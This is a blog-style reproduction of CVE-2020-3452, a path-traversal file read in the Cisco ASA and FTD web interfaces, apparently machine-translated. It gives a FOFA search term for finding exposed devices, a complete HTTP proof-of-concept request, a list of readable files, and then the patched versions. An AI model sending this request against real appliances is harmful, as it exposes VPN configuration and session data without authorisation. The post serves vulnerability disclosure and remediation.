CISCO ASA device arbitrary file read vulnerability reproduction (CVE-2020-3452)

Others 2021-03-30 06:31:46 views: null

Vulnerability description

The Cisco Adaptive Security Appliance (ASA) firewall device and the Web management interface of the Cisco Firepower Threat Defense (FTD) device have unauthorized directory traversal vulnerabilities and remote arbitrary file reading vulnerabilities, allowing unauthenticated remote attackers to carry out directory traversal attacks And read sensitive files on the target system. This vulnerability cannot be used to gain access to ASA or FTD system files or underlying operating system (OS) files. Therefore, it can only read files in web system directories, such as webvpn configuration files, Information such as bookmarks, web cookies, part of web content, and hypertext transfer protocol URLs.

Vulnerability impact version

Insert picture description here
Insert picture description here

Vulnerability recurrence

FOFA search keywords:
/+CSCOE+/
POC is issued as follows

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: webvpnlogin=1; webvpnLang=en

Insert picture description here

The following files can be read

"sess_update.html"
"blank.html"
"noportal.html"
"portal_ce.html"
"portal.html"
"logon_custom.css"
"svc.html"
"logo.gif"
"portal_inc.lua"
"nostcaccess.html"
"session.js"
"portal.js"
"portal_custom.css"
"running.conf"
"tlbrportal_forms.js"
"logon_forms.js"
"win.js"
"portal.css"
"lced.html"
"pluginlib.js"
"useralert.html"
"ping.html"
"app_index.html"
"shshimdo_url"
"session_password.html"
"relayjar.html"
"relayocx.html"
"color_picker.js"
"color_picker.html"
"cedhelp.html"
"cedmain.html"
"cedlogon.html"
"cedportal.html"
"portal_elements.html"
"commonspawn.js"
"common.js"
"appstart.js"
"relaymonjar.html"
"relaymonocx.html"
"cedsave.html"
"tunnel_linux.jnlp"
"ask.html"
"no_svc.html"
"preview.html"
"cedf.html"
"ced.html"
"logon_redirect.html"
"logout.html"
"tunnel_mac.jnlp"
"gp-gip.html"
"auth.html"
"wrong_url.html"
"logon.html"

Repair opinions

Cisco ASA

Upgrade to a repair version before version
9.6 9.6 upgrade to 9.6.4.42 version
9.7 upgrade to a repair version
9.8 upgrade to 9.8.420 version
9.9 version upgrade to 9.9.2.74 version
9.10 version upgrade to 9.10.1.42 version
9.12 Upgrade to 9.12.3.12 Version
9.13 Version Upgrade to 9.13.1.10 Version
9.14 Version Upgrade to 9.14.1.10 Version
Cisco FTD:

Upgrade from 6.2.2 version to a repair version
6.2.3 upgrade to 6.2.3.16 version
6.3.0 upgrade to 6.3.0.5 (Hot Fix)/6.3.0.6/6.4.0.9 (Hot Fix)/6.6.0.1 version
Upgrade from 6.4.0 version to 6.4.0.9 (Hot Fix)/6.4.0.10 version
6.5.0 upgrade to 6.5.0.4 (Hot Fix)/6.5.0.5/6.6.0.1 version
6.6.0 version upgrade to 6.6.0.1 version
Cisco FTD Hot Fix details:

6.3.0.5:
Cisco_FTD_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_AV-6.3.0.6-3.sh.REL.tar
6.4.0.9:
Cisco_FTD_Hotfix_BM-6.4 .0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_Hotfix_BM-6.4.0.10-2.sh.REL.tar
6.5 .0.4:
Cisco_FTD_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_O-6.5.0.5-3.sh.REL.tar
To upgrade sh.REL.tar to the repaired version of Cisco FTD, customers can perform one of the following operations:

For devices using Cisco Firepower Management Center (FMC), please use the FMC interface to install and upgrade. After the installation is complete, reapply the access control policy.

For devices using Cisco Firepower Device Manager (FDM), please use the FDM interface to install and upgrade. After the installation is complete, reapply the access control policy.

Guess you like

Origin blog.csdn.net/weixin_44146996/article/details/113557524
Recommended
Face Wall Intelligence releases the Eurux-8x22B open source large model - it can be called the "science champion"
Kaiyuan Daily | Google supports Hongmeng to take over; open source Rabbit R1; Android phones supported by Docker; Microsoft’s anxiety and ambition; Haier Electric shuts down the open platform
Ranking
Jianzhi offer interview questions 68-II. The nearest common ancestor of a binary tree (recursive)
jQuery Mobile development 1-UI components
Summary of Kotlin function knowledge
[ZZ] The Naked Truth About Anisotropic Filtering
Diagnosis: record a recovery of abnormal CRASH storage caused the database to be unable to be opened normally
Redis introduction and Linux installation Redis
Experiment 2 Introduction to switches
glances open source command-line system monitoring tools introduced
Use of selector
vue3 handwriting a carousel picture
Daily
More
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)

Code World

© 2018 codetd.com